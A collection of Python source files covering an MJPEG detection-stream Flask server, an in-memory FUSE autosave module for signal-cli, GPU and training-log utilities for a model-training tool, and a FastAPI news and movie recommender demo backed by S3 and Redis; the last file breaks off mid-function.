def generate():
'''Build the MJPEG frame generator
'''
global outputFrame, lock
while True:
with lock:
if outputFrame is None:
continue
(flag,encodedImage) = cv2.imencode(".jpg",outputFrame)
if not flag:
continue
yield(b"--frame\r\n" b"Content-Type:image/jpeg\r\n\r\n"+bytearray(encodedImage)+b"\r\n")
# serve the frames
@app.route("/video_feed")
def video_feed():
return Response(generate(),mimetype='multipart/x-mixed-replace;boundary=frame')
# update echarts data asynchronously via ajax
@app.route("/get_bar")
def get_bar():
global probs
bar = (
Bar()
.add_xaxis(label_name)
.add_yaxis("Detection Probs",probs)
)
# print(bar.render_embed())
# print(bar.dump_options())
# return render_template("index.html",bar_data=bar.dump_options())
# return bar.dump_options_with_quotes()
return bar.dump_options()
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-i","--ip",type=str,required=True,help="IP")
ap.add_argument("-o","--port",type=int,required=True,help="port")
args = vars(ap.parse_args())
# run detection in a background thread
t = threading.Thread(target=detect_yolo_lite)
t.daemon = True
t.start()
app.run(host=args["ip"],port=args["port"],debug=True,threaded=True,
use_reloader=False)
# release the video stream
vs.release()  # cv2.VideoCapture objects are released, not stopped
|
autosave.py
|
#!/usr/bin/python3.9
# Copyright (c) 2021 MobileCoin Inc.
# Copyright (c) 2021 The Forest Team
import asyncio
import logging
import os
import time
from pathlib import Path
from subprocess import PIPE, Popen
from typing import Any
import aioprocessing
from aiohttp import web
from forest import fuse, mem, utils
_memfs_process = None
# this is the first thing that runs on aiohttp app startup, before datastore.download
async def start_memfs(app: web.Application) -> None:
"""
mount a filesystem in userspace to store data
the fs contents are stored in memory, so that our keys never touch a disk
this means we can log signal-cli's interactions with fs,
and store them in mem_queue.
"""
logging.info("starting memfs")
app["mem_queue"] = mem_queue = aioprocessing.AioQueue()
if not os.path.exists("/dev/fuse"):
# you *must* have fuse already loaded if running locally
proc = Popen(
["/usr/sbin/insmod", "/app/fuse.ko"],
stdout=PIPE,
stderr=PIPE,
)
proc.wait()
(stdout, stderr) = proc.communicate() # pylint: disable=unused-variable
if stderr:
raise Exception(
f"Could not load fuse module! You may need to recompile.\t\n{stderr.decode()}"
)
def memfs_proc(path: str = "data") -> Any:
"""Start the memfs process"""
mountpath = Path(utils.ROOT_DIR) / path
logging.info("Starting memfs with PID: %s on dir: %s", os.getpid(), mountpath)
backend = mem.Memory(logqueue=mem_queue) # type: ignore
logging.info("mountpoint already exists: %s", mountpath.exists())
Path(utils.ROOT_DIR).mkdir(exist_ok=True, parents=True)
return fuse.FUSE(operations=backend, mountpoint=utils.ROOT_DIR + "/data") # type: ignore
async def launch() -> None:
global _memfs_process  # needed so the assignment below updates the module-level variable
logging.info("about to launch memfs with aioprocessing")
memfs = aioprocessing.AioProcess(target=memfs_proc)
memfs.start() # pylint: disable=no-member
app["memfs"] = memfs
_memfs_process = memfs
await launch()
# input, operation, path, arguments, caller
# ["->", "fsync", "/+14703226669", "(1, 2)", "/app/signal-cli", ["/app/signal-cli", "--config", "/app", "--username=+14703226669", "--output=json", "stdio", ""], 0, 0, 523]
# ["<-", "fsync", "0"]
async def start_memfs_monitor(app: web.Application) -> None:
"""
monitor the memfs activity queue for file saves, sync with supabase
"""
async def upload_after_signalcli_writes() -> None:
queue = app.get("mem_queue")
if not queue:
logging.info("no mem_queue, nothing to monitor")
return
logging.info("monitoring memfs")
counter = 0
while True:
queue_item = await queue.coro_get()
# iff fsync triggered by signal-cli
if queue_item[0:2] == ["->", "fsync"] and "-cli" in queue_item[5][0]:
# /+14703226669
# file_to_sync = queue_item[2]
# 14703226669
maybe_session = app.get("session")
if maybe_session:
counter += 1
if int(time.time()) % (60 * 3) == 0:  # time.time() is a float, so compare on whole seconds
logging.info("background syncs in the past ~3min: %s", counter)
counter = 0
await maybe_session.datastore.upload()
app["mem_task"] = asyncio.create_task(upload_after_signalcli_writes())
|
utils.py
|
import psutil
import shutil
import os
import os.path as osp
from enum import Enum
import multiprocessing as mp
from queue import Queue
import time
import threading
from ctypes import CDLL, c_char, c_uint, c_ulonglong
from _ctypes import byref, Structure, POINTER
import platform
import string
import logging
import socket
import logging.handlers
import requests
import json
from json import JSONEncoder
class CustomEncoder(JSONEncoder):
def default(self, o):
return o.__dict__
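# Minimal usage sketch (MyConfig is a hypothetical object with plain,
# JSON-serializable attributes): json.dumps(MyConfig(), cls=CustomEncoder)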
class ShareData():
workspace = None
workspace_dir = ""
has_gpu = True
monitored_processes = mp.Queue(4096)
current_port = 8000
running_boards = {}
machine_info = dict()
load_demo_proc_dict = {}
load_demo_proj_data_dict = {}
DatasetStatus = Enum(
'DatasetStatus', ('XEMPTY', 'XCHECKING', 'XCHECKFAIL', 'XCOPYING',
'XCOPYDONE', 'XCOPYFAIL', 'XSPLITED'),
start=0)
TaskStatus = Enum(
'TaskStatus', ('XUNINIT', 'XINIT', 'XDOWNLOADING', 'XTRAINING',
'XTRAINDONE', 'XEVALUATED', 'XEXPORTING', 'XEXPORTED',
'XTRAINEXIT', 'XDOWNLOADFAIL', 'XTRAINFAIL', 'XEVALUATING',
'XEVALUATEFAIL', 'XEXPORTFAIL', 'XPRUNEING', 'XPRUNETRAIN'),
start=0)
ProjectType = Enum(
'ProjectType', ('classification', 'detection', 'segmentation',
'instance_segmentation', 'remote_segmentation'),
start=0)
DownloadStatus = Enum(
'DownloadStatus',
('XDDOWNLOADING', 'XDDOWNLOADFAIL', 'XDDOWNLOADDONE', 'XDDECOMPRESSED'),
start=0)
PredictStatus = Enum(
'PredictStatus', ('XPRESTART', 'XPREDONE', 'XPREFAIL'), start=0)
PruneStatus = Enum(
'PruneStatus', ('XSPRUNESTART', 'XSPRUNEING', 'XSPRUNEDONE', 'XSPRUNEFAIL',
'XSPRUNEEXIT'),
start=0)
PretrainedModelStatus = Enum(
'PretrainedModelStatus',
('XPINIT', 'XPSAVING', 'XPSAVEFAIL', 'XPSAVEDONE'),
start=0)
ExportedModelType = Enum(
'ExportedModelType', ('XQUANTMOBILE', 'XPRUNEMOBILE', 'XTRAINMOBILE',
'XQUANTSERVER', 'XPRUNESERVER', 'XTRAINSERVER'),
start=0)
process_pool = Queue(1000)
def get_ip():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))  # no packets are sent; connecting a UDP socket just picks the outbound interface
ip = s.getsockname()[0]
finally:
s.close()
return ip
def get_logger(filename):
flask_logger = logging.getLogger()
flask_logger.setLevel(level=logging.INFO)
fmt = '%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s:%(message)s'
format_str = logging.Formatter(fmt)
ch = logging.StreamHandler()
ch.setLevel(level=logging.INFO)
ch.setFormatter(format_str)
th = logging.handlers.TimedRotatingFileHandler(
filename=filename, when='D', backupCount=5, encoding='utf-8')
th.setFormatter(format_str)
flask_logger.addHandler(th)
flask_logger.addHandler(ch)
return flask_logger
def start_process(target, args):
global process_pool
p = mp.Process(target=target, args=args)
p.start()
process_pool.put(p)
def pkill(pid):
"""结束进程pid,和与其相关的子进程
Args:
pid(int): 进程id
"""
try:
parent = psutil.Process(pid)
for child in parent.children(recursive=True):
child.kill()
parent.kill()
except:
print("Try to kill process {} failed.".format(pid))
def set_folder_status(dirname, status, message=""):
"""设置目录状态
Args:
dirname(str): 目录路径
status(DatasetStatus): 状态
message(str): 需要写到状态文件里的信息
"""
if not osp.isdir(dirname):
raise Exception("目录路径{}不存在".format(dirname))
tmp_file = osp.join(dirname, status.name + '.tmp')
with open(tmp_file, 'w', encoding='utf-8') as f:
f.write("{}\n".format(message))
shutil.move(tmp_file, osp.join(dirname, status.name))
for status_type in [
DatasetStatus, TaskStatus, PredictStatus, PruneStatus,
DownloadStatus, PretrainedModelStatus
]:
for s in status_type:
if s == status:
continue
if osp.exists(osp.join(dirname, s.name)):
os.remove(osp.join(dirname, s.name))
def get_folder_status(dirname, with_message=False):
"""获取目录状态
Args:
dirname(str): 目录路径
with_message(bool): 是否需要返回状态文件内的信息
"""
status = None
closest_time = 0
message = ''
for status_type in [
DatasetStatus, TaskStatus, PredictStatus, PruneStatus,
DownloadStatus, PretrainedModelStatus
]:
for s in status_type:
if osp.exists(osp.join(dirname, s.name)):
modify_time = os.stat(osp.join(dirname, s.name)).st_mtime
if modify_time > closest_time:
closest_time = modify_time
status = getattr(status_type, s.name)
if with_message:
encoding = 'utf-8'
try:
f = open(
osp.join(dirname, s.name),
'r',
encoding=encoding)
message = f.read()
f.close()
except:
try:
import chardet
                            f = open(osp.join(dirname, s.name), 'rb')
data = f.read()
f.close()
encoding = chardet.detect(data).get('encoding')
f = open(
osp.join(dirname, s.name),
'r',
encoding=encoding)
message = f.read()
f.close()
except:
pass
if with_message:
return status, message
return status
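# Illustrative sketch (ours, not part of the original module): how the
# status-file convention above is meant to be used. A directory carries
# exactly one status at a time, stored as a file named after the enum member.
def _demo_folder_status():
    import tempfile
    workdir = tempfile.mkdtemp()
    set_folder_status(workdir, TaskStatus.XTRAINING, message="pid=1234")
    status, msg = get_folder_status(workdir, with_message=True)
    # status is TaskStatus.XTRAINING and msg is "pid=1234\n"
    return status, msg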
def _machine_check_proc(queue, path):
info = dict()
p = PyNvml()
gpu_num = 0
try:
# import paddle.fluid.core as core
# gpu_num = core.get_cuda_device_count()
p.nvml_init(path)
gpu_num = p.nvml_device_get_count()
driver_version = bytes.decode(p.nvml_system_get_driver_version())
except:
driver_version = "N/A"
info['gpu_num'] = gpu_num
info['gpu_free_mem'] = list()
try:
for i in range(gpu_num):
handle = p.nvml_device_get_handle_by_index(i)
meminfo = p.nvml_device_get_memory_info(handle)
free_mem = meminfo.free / 1024 / 1024
info['gpu_free_mem'].append(free_mem)
except:
pass
info['cpu_num'] = os.environ.get('CPU_NUM', 1)
info['driver_version'] = driver_version
info['path'] = p.nvml_lib_path
queue.put(info, timeout=2)
def get_machine_info(path=None):
queue = mp.Queue(1)
p = mp.Process(target=_machine_check_proc, args=(queue, path))
p.start()
p.join()
return queue.get(timeout=2)
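# Note (ours): probing NVML in a child process isolates the server from a
# missing or wedged driver; get_machine_info() blocks on join() and then
# reads the single-slot queue, e.g.
#   info = get_machine_info()
#   # -> {'gpu_num': ..., 'gpu_free_mem': [...], 'cpu_num': ..., ...}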
def download(url, target_path):
if not osp.exists(target_path):
os.makedirs(target_path)
fname = osp.split(url)[-1]
fullname = osp.join(target_path, fname)
retry_cnt = 0
DOWNLOAD_RETRY_LIMIT = 3
while not (osp.exists(fullname)):
if retry_cnt < DOWNLOAD_RETRY_LIMIT:
retry_cnt += 1
else:
            # Mark the download as failed
msg = "Download from {} failed. Retry limit reached".format(url)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADFAIL, msg)
raise RuntimeError(msg)
req = requests.get(url, stream=True)
if req.status_code != 200:
msg = "Downloading from {} failed with code {}!".format(
url, req.status_code)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADFAIL, msg)
raise RuntimeError(msg)
        # To guard against interrupted downloads, write to
        # tmp_fullname first, then move tmp_fullname to fullname
        # once the download has finished
tmp_fullname = fullname + "_tmp"
total_size = req.headers.get('content-length')
set_folder_status(target_path, DownloadStatus.XDDOWNLOADING,
total_size)
with open(tmp_fullname, 'wb') as f:
if total_size:
download_size = 0
for chunk in req.iter_content(chunk_size=1024):
f.write(chunk)
                    download_size += len(chunk)  # the last chunk may be shorter than 1024
else:
for chunk in req.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
shutil.move(tmp_fullname, fullname)
set_folder_status(target_path, DownloadStatus.XDDOWNLOADDONE)
return fullname
def is_pic(filename):
suffixes = {'JPEG', 'jpeg', 'JPG', 'jpg', 'BMP', 'bmp', 'PNG', 'png'}
suffix = filename.strip().split('.')[-1]
if suffix not in suffixes:
return False
return True
def is_available(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, int(port)))
s.shutdown(2)
return False
except:
return True
def list_files(dirname):
""" 列出目录下所有文件(包括所属的一级子目录下文件)
Args:
dirname: 目录路径
"""
def filter_file(f):
if f.startswith('.'):
return True
if hasattr(PretrainedModelStatus, f):
return True
return False
all_files = list()
dirs = list()
for f in os.listdir(dirname):
if filter_file(f):
continue
if osp.isdir(osp.join(dirname, f)):
dirs.append(f)
else:
all_files.append(f)
for d in dirs:
for f in os.listdir(osp.join(dirname, d)):
if filter_file(f):
continue
if osp.isdir(osp.join(dirname, d, f)):
continue
all_files.append(osp.join(d, f))
return all_files
def copy_model_directory(src, dst, files=None, filter_files=[]):
"""从src目录copy文件至dst目录,
注意:拷贝前会先清空dst中的所有文件
Args:
src: 源目录路径
dst: 目标目录路径
files: 需要拷贝的文件列表(src的相对路径)
"""
set_folder_status(dst, PretrainedModelStatus.XPSAVING, os.getpid())
if files is None:
files = list_files(src)
try:
message = '{} {}'.format(os.getpid(), len(files))
set_folder_status(dst, PretrainedModelStatus.XPSAVING, message)
if not osp.samefile(src, dst):
for i, f in enumerate(files):
items = osp.split(f)
if len(items) > 2:
continue
if len(items) == 2:
if not osp.isdir(osp.join(dst, items[0])):
if osp.exists(osp.join(dst, items[0])):
os.remove(osp.join(dst, items[0]))
os.makedirs(osp.join(dst, items[0]))
if f not in filter_files:
shutil.copy(osp.join(src, f), osp.join(dst, f))
set_folder_status(dst, PretrainedModelStatus.XPSAVEDONE)
except Exception as e:
import traceback
error_info = traceback.format_exc()
set_folder_status(dst, PretrainedModelStatus.XPSAVEFAIL, error_info)
def copy_pretrained_model(src, dst):
p = mp.Process(
target=copy_model_directory, args=(src, dst, None, ['model.pdopt']))
p.start()
return p
def _get_gpu_info(queue):
gpu_info = dict()
mem_free = list()
mem_used = list()
mem_total = list()
import pycuda.driver as drv
from pycuda.tools import clear_context_caches
drv.init()
driver_version = drv.get_driver_version()
gpu_num = drv.Device.count()
for gpu_id in range(gpu_num):
dev = drv.Device(gpu_id)
try:
context = dev.make_context()
free, total = drv.mem_get_info()
context.pop()
free = free // 1024 // 1024
total = total // 1024 // 1024
used = total - free
except:
free = 0
total = 0
used = 0
mem_free.append(free)
mem_used.append(used)
mem_total.append(total)
gpu_info['mem_free'] = mem_free
gpu_info['mem_used'] = mem_used
gpu_info['mem_total'] = mem_total
gpu_info['driver_version'] = driver_version
gpu_info['gpu_num'] = gpu_num
queue.put(gpu_info)
def get_gpu_info():
try:
import pycuda
except:
gpu_info = dict()
message = "未检测到GPU \n 若存在GPU请确保安装pycuda \n 若未安装pycuda请使用'pip install pycuda'来安装"
gpu_info['gpu_num'] = 0
return gpu_info, message
queue = mp.Queue(1)
p = mp.Process(target=_get_gpu_info, args=(queue, ))
p.start()
p.join()
gpu_info = queue.get(timeout=2)
if gpu_info['gpu_num'] == 0:
message = "未检测到GPU"
else:
message = "检测到GPU"
return gpu_info, message
class TrainLogReader(object):
def __init__(self, log_file):
self.log_file = log_file
self.eta = None
self.train_metrics = None
self.eval_metrics = None
self.download_status = None
self.eval_done = False
self.train_error = None
self.train_stage = None
self.running_duration = None
def update(self):
if not osp.exists(self.log_file):
return
if self.train_stage == "Train Error":
return
if self.download_status == "Failed":
return
if self.train_stage == "Train Complete":
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
self.eta = None
self.train_metrics = None
self.eval_metrics = None
if self.download_status != "Done":
self.download_status = None
start_time_timestamp = osp.getctime(self.log_file)
        for line in logs:
try:
start_time_str = " ".join(line.split()[0:2])
start_time_array = time.strptime(start_time_str,
"%Y-%m-%d %H:%M:%S")
start_time_timestamp = time.mktime(start_time_array)
break
except Exception as e:
pass
for line in logs[::-1]:
if line.count('Train Complete!'):
self.train_stage = "Train Complete"
if line.count('Training stop with error!'):
self.train_error = line
if self.train_metrics is not None \
and self.eval_metrics is not None and self.eval_done and self.eta is not None:
break
items = line.strip().split()
if line.count('Model saved in'):
self.eval_done = True
if line.count('download completed'):
self.download_status = 'Done'
break
if line.count('download failed'):
self.download_status = 'Failed'
break
if self.download_status != 'Done':
if line.count('[DEBUG]\tDownloading'
) and self.download_status is None:
self.download_status = dict()
if not line.endswith('KB/s'):
continue
speed = items[-1].strip('KB/s').split('=')[-1]
download = items[-2].strip('M, ').split('=')[-1]
total = items[-3].strip('M, ').split('=')[-1]
self.download_status['speed'] = speed
self.download_status['download'] = float(download)
self.download_status['total'] = float(total)
if self.eta is None:
if line.count('eta') > 0 and (line[-3] == ':' or
line[-4] == ':'):
eta = items[-1].strip().split('=')[1]
h, m, s = [int(x) for x in eta.split(':')]
self.eta = h * 3600 + m * 60 + s
if self.train_metrics is None:
if line.count('[INFO]\t[TRAIN]') > 0 and line.count(
'Step') > 0:
if not items[-1].startswith('eta'):
continue
self.train_metrics = dict()
metrics = items[4:]
for metric in metrics:
try:
name, value = metric.strip(', ').split('=')
value = value.split('/')[0]
if value.count('.') > 0:
value = float(value)
elif value == 'nan':
value = 'nan'
else:
value = int(value)
self.train_metrics[name] = value
except:
pass
if self.eval_metrics is None:
if line.count('[INFO]\t[EVAL]') > 0 and line.count(
'Finished') > 0:
if not line.strip().endswith(' .'):
continue
self.eval_metrics = dict()
metrics = items[5:]
for metric in metrics:
try:
name, value = metric.strip(', ').split('=')
value = value.split('/')[0]
if value.count('.') > 0:
value = float(value)
else:
value = int(value)
self.eval_metrics[name] = value
except:
pass
end_time_timestamp = osp.getmtime(self.log_file)
t_diff = time.gmtime(end_time_timestamp - start_time_timestamp)
self.running_duration = "{}小时{}分{}秒".format(
t_diff.tm_hour, t_diff.tm_min, t_diff.tm_sec)
class PruneLogReader(object):
def init_attr(self):
self.eta = None
self.iters = None
self.current = None
self.progress = None
def __init__(self, log_file):
self.log_file = log_file
self.init_attr()
def update(self):
if not osp.exists(self.log_file):
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
self.init_attr()
for line in logs[::-1]:
metric_loaded = True
for k, v in self.__dict__.items():
if v is None:
metric_loaded = False
break
if metric_loaded:
break
if line.count("Total evaluate iters") > 0:
items = line.split(',')
for item in items:
kv_list = item.strip().split()[-1].split('=')
kv_list = [v.strip() for v in kv_list]
setattr(self, kv_list[0], kv_list[1])
class QuantLogReader:
def __init__(self, log_file):
self.log_file = log_file
self.stage = None
self.running_duration = None
def update(self):
if not osp.exists(self.log_file):
return
logs = open(self.log_file, encoding='utf-8').read().strip().split('\n')
for line in logs[::-1]:
items = line.strip().split(' ')
if line.count('[Run batch data]'):
info = items[-3][:-1].split('=')[1]
batch_id = float(info.split('/')[0])
batch_all = float(info.split('/')[1])
self.running_duration = \
batch_id / batch_all * (10.0 / 30.0)
self.stage = 'Batch'
break
elif line.count('[Calculate weight]'):
info = items[-3][:-1].split('=')[1]
weight_id = float(info.split('/')[0])
weight_all = float(info.split('/')[1])
self.running_duration = \
weight_id / weight_all * (3.0 / 30.0) + (10.0 / 30.0)
self.stage = 'Weight'
break
elif line.count('[Calculate activation]'):
info = items[-3][:-1].split('=')[1]
activation_id = float(info.split('/')[0])
activation_all = float(info.split('/')[1])
self.running_duration = \
activation_id / activation_all * (16.0 / 30.0) + (13.0 / 30.0)
self.stage = 'Activation'
break
elif line.count('Finish quant!'):
self.stage = 'Finish'
break
class PyNvml(object):
""" Nvidia GPU驱动检测类,可检测当前GPU驱动版本"""
class PrintableStructure(Structure):
_fmt_ = {}
def __str__(self):
result = []
for x in self._fields_:
key = x[0]
value = getattr(self, key)
fmt = "%s"
if key in self._fmt_:
fmt = self._fmt_[key]
elif "<default>" in self._fmt_:
fmt = self._fmt_["<default>"]
result.append(("%s: " + fmt) % (key, value))
            return self.__class__.__name__ + "(" + ", ".join(result) + ")"
class c_nvmlMemory_t(PrintableStructure):
_fields_ = [
('total', c_ulonglong),
('free', c_ulonglong),
('used', c_ulonglong),
]
_fmt_ = {'<default>': "%d B"}
## Device structures
class struct_c_nvmlDevice_t(Structure):
pass # opaque handle
c_nvmlDevice_t = POINTER(struct_c_nvmlDevice_t)
def __init__(self):
self.nvml_lib = None
self.nvml_lib_refcount = 0
self.lib_load_lock = threading.Lock()
self.nvml_lib_path = None
def nvml_init(self, nvml_lib_path=None):
self.lib_load_lock.acquire()
sysstr = platform.system()
if nvml_lib_path is None or nvml_lib_path.strip() == "":
if sysstr == "Windows":
nvml_lib_path = osp.join(
os.getenv("ProgramFiles", "C:/Program Files"),
"NVIDIA Corporation/NVSMI")
if not osp.exists(osp.join(nvml_lib_path, "nvml.dll")):
nvml_lib_path = "C:\\Windows\\System32"
elif sysstr == "Linux":
p1 = "/usr/lib/x86_64-linux-gnu"
p2 = "/usr/lib/i386-linux-gnu"
if osp.exists(osp.join(p1, "libnvidia-ml.so.1")):
nvml_lib_path = p1
elif osp.exists(osp.join(p2, "libnvidia-ml.so.1")):
nvml_lib_path = p2
else:
nvml_lib_path = ""
else:
nvml_lib_path = "N/A"
nvml_lib_dir = nvml_lib_path
if sysstr == "Windows":
nvml_lib_path = osp.join(nvml_lib_dir, "nvml.dll")
else:
nvml_lib_path = osp.join(nvml_lib_dir, "libnvidia-ml.so.1")
self.nvml_lib_path = nvml_lib_path
try:
self.nvml_lib = CDLL(nvml_lib_path)
fn = self._get_fn_ptr("nvmlInit_v2")
fn()
if sysstr == "Windows":
driver_version = bytes.decode(
self.nvml_system_get_driver_version())
if driver_version.strip() == "":
nvml_lib_path = osp.join(nvml_lib_dir, "nvml9.dll")
self.nvml_lib = CDLL(nvml_lib_path)
fn = self._get_fn_ptr("nvmlInit_v2")
fn()
except Exception as e:
raise e
finally:
self.lib_load_lock.release()
self.lib_load_lock.acquire()
self.nvml_lib_refcount += 1
self.lib_load_lock.release()
def create_string_buffer(self, init, size=None):
if isinstance(init, bytes):
if size is None:
size = len(init) + 1
buftype = c_char * size
buf = buftype()
buf.value = init
return buf
elif isinstance(init, int):
buftype = c_char * init
buf = buftype()
return buf
raise TypeError(init)
def _get_fn_ptr(self, name):
return getattr(self.nvml_lib, name)
def nvml_system_get_driver_version(self):
c_version = self.create_string_buffer(81)
fn = self._get_fn_ptr("nvmlSystemGetDriverVersion")
ret = fn(c_version, c_uint(81))
return c_version.value
def nvml_device_get_count(self):
c_count = c_uint()
fn = self._get_fn_ptr("nvmlDeviceGetCount_v2")
ret = fn(byref(c_count))
return c_count.value
def nvml_device_get_handle_by_index(self, index):
c_index = c_uint(index)
device = PyNvml.c_nvmlDevice_t()
fn = self._get_fn_ptr("nvmlDeviceGetHandleByIndex_v2")
ret = fn(c_index, byref(device))
return device
def nvml_device_get_memory_info(self, handle):
c_memory = PyNvml.c_nvmlMemory_t()
fn = self._get_fn_ptr("nvmlDeviceGetMemoryInfo")
ret = fn(handle, byref(c_memory))
return c_memory
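# Illustrative sketch (ours): exercising the PyNvml wrapper above. It assumes
# an NVIDIA driver is installed; nvml_init raises otherwise.
def _demo_pynvml(lib_path=None):
    nv = PyNvml()
    nv.nvml_init(lib_path)  # auto-detects nvml.dll / libnvidia-ml.so.1
    print("driver:", bytes.decode(nv.nvml_system_get_driver_version()))
    for i in range(nv.nvml_device_get_count()):
        handle = nv.nvml_device_get_handle_by_index(i)
        mem = nv.nvml_device_get_memory_info(handle)
        print("gpu %d free: %d MiB" % (i, mem.free // 1024 // 1024))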
|
server.py
|
import json
import logging
import os
import uuid
from typing import List
import sys
import cache
import math
import base64
from random import randint
from multiprocessing import Process, Pool
from threading import Thread
import boto3
import botocore
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException, APIRouter, Depends
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
import random
import calendar
import time
from bs4 import BeautifulSoup
from functools import partial, total_ordering
from requests import ConnectTimeout
from typing import Optional
from fastapi.responses import JSONResponse
class LoginRequest(BaseModel):
userId: str
userName: Optional[str] = None
class TrainRequest(BaseModel):
change_type: str
class URLRequest(BaseModel):
title: str
class ClickRequest(BaseModel):
userId: str
itemId: str
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
MANDATORY_ENV_VARS = {
'DEMO_PORT': 5900,
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'EVENT_SERVICE_ENDPOINT': 'http://event:5100',
'RETRIEVE_SERVICE_ENDPOINT': 'http://retrieve:5600',
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'AWS_REGION': 'ap-southeast-1',
'CLICK_RECORD_BUCKET': 'gcr-rs-ops-ap-southeast-1-522244679887',
'CLICK_RECORD_FILE_PATH': 'system/ingest-data/action/',
'USER_RECORD_FILE_PATH': 'system/ingest-data/user/',
'TEST': ''
}
REDIS_KEY_USER_ID_CLICK_DICT = 'user_id_click_dict'
REDIS_KEY_USER_LOGIN_DICT = 'user_login_dict'
TRIGGER_RECALL_WINDOW = 3
news_records_dict = 'news_records_dict'
movie_records_dict = 'movie_records_dict'
user_id_action_dict = 'user_id_action_dict'
lNewsCfgCompleteType = ['news_story', 'news_culture', 'news_entertainment', 'news_sports', 'news_finance', 'news_house',
'news_car', 'news_edu', 'news_tech', 'news_military', 'news_travel', 'news_world', 'news_agriculture', 'news_game']
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
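# Note (ours): @xasync turns a call into fire-and-forget work on a plain
# (non-daemon) Thread; the caller gets no handle and no return value. A
# minimal hypothetical use:
#
#   @xasync
#   def warm_cache(key):
#       logging.info('warming %s', key)
#
#   warm_cache('news')   # returns immediately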
@app.get('/api/v1/demo/dashboard', tags=["demo"])
def get_dashboard_data():
logging.info('Start demo->get_dashboard_data()...')
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_name = 'system/dashboard/dashboard.json'
file_key = os.path.join(s3_prefix, file_name)
s3 = boto3.resource('s3')
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
json_data = json.loads(object_str)
return response_success(json_data)
# notify the demo service to load news record data
@app.post('/api/v1/demo/notice', tags=["demo"])
def notice(loadRequest: LoadRequest):
logging.info('Start demo->notice()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'news_records':
for file in file_list:
init_news_records_data(file_type, file_path, file, news_records_dict)
elif file_type == 'movie_records':
for file in file_list:
init_movie_records_data(file_type, file_path, file, movie_records_dict)
    # FastAPI serializes the return value itself; the Flask-style
    # (body, status, headers) tuple would be rendered as a JSON array.
    return response_success({'result': 'success'})
@app.post('/api/v1/demo/login', tags=["demo"])
def login(loginRequest: LoginRequest):
logging.info('Start demo->login()...')
user_id = loginRequest.userId
user_name = loginRequest.userName
    if user_name is None:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append('anonymous')
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
#AddUser to AWS Personalize
call_personalize_add_user(user_id, temp_array[1])
return response_success({
"message": "Login as anonymous user!",
"data": {
"userId": user_id,
"visitCount": 1
}
})
user_id_in_sever = get_user_id_by_name(user_name)
logging.info(
'login_post() - user_id_in_sever: {}'.format(user_id_in_sever))
if not user_id_in_sever:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append(user_name)
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
# call aws personalize addUser api
call_personalize_add_user(user_id, temp_array[1])
login_new_user(user_name, user_id)
user_id_in_sever = user_id
visit_count = increase_visit_count(user_name)
response = {
"message": "Login success",
"data": {
"userId": user_id_in_sever,
"visitCount": visit_count
}
}
return response_success(response)
def call_personalize_add_user(user_id, user_sex):
logging.info("Start add new user, user id:{}, user sex:{}".format(user_id, user_sex))
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/add_user/' + user_id
return send_post_request(url, {
'user_id': user_id,
'user_sex': user_sex
})
def get_random_sex():
random_sex_list = ['M', 'F']
return random_sex_list[random.randint(0, len(random_sex_list) - 1)]
def get_random_age():
return str(random.randint(15, 60))
@app.get('/api/v1/demo/news', tags=["demo"])
def get_recommend_news(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_news()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend news list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
